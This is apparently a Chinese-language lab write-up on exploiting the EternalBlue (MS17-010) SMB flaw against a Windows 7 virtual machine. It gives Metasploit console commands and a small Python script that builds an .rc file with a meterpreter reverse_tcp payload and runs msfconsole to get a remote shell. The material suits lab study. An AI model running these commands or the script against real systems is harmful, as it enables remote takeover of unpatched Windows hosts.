記錄一次 先手工 再python指令碼 驗證永恆之藍ms17-10漏洞
檢視資料 ms17-10漏洞利用的步驟大致如下
開啟msf
use auxiliary/scanner/smb/smb_ms17_010
msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
msf exploit(ms17_010_eternalblue) > set RHOST *******************
msf exploit(ms17_010_eternalblue) > set LHOST *******************
msf exploit(ms17_010_eternalblue) > exploit
嘗試用python指令碼
使用sys 和os 模組
import
sys
import
os
print
'Metasploit executing the ms-17-010 vulnerability attack'
#這句話的意思是正在實施MS17010漏洞的攻擊
def
sds(config):
config
=
open
(
'yhzl.rc'
,
'w'
)
#首先我們來建立一個xxx.rc的檔案
#把你要使用到的模組和對應的引數寫入xxx.rc裡去
config.write(
'use exploit/windows/smb/ms17_010_eternalblue'
+
"\n"
)
config.write(
'set PAYLOAD windows/x64/meterpreter/reverse_tcp'
+
"\n"
)
config.write(
'set RHOST '
+
sys.argv[
1
]
+
"\n"
)
config.write(
'set LHOST '
+
sys.argv[
2
]
+
"\n"
)
config.write(
'exploit'
+
"\n"
)
sds('')
def
main():
mg
=
os.system(
'msfconsole -r /root/yhzl.rc'
)
#執行msfconsole -r 路徑/xxx.rc,就可以了
if
__name__
=
=
'__main__'
:
main()
本次實驗的攻擊機kali:192.168.88.118
win7靶機:192.168.88.133(開啟445共享服務)
首先對靶機進行一個初步掃描
nmap 192.168.88.133
開啟445埠
開啟metasploit
設定相應payload 目的地址 本機地址
執行
檢視相應靶機資訊
進入控制檯shell 檢視使用者
成功
接下來嘗試 之前的指令碼 執行結果
執行 把靶機地址 和 攻擊機地址加在後面 ps:sys模組(用於接收資料)
成功
python程式分析: 建立了一個rc指令碼檔案用metasploit執行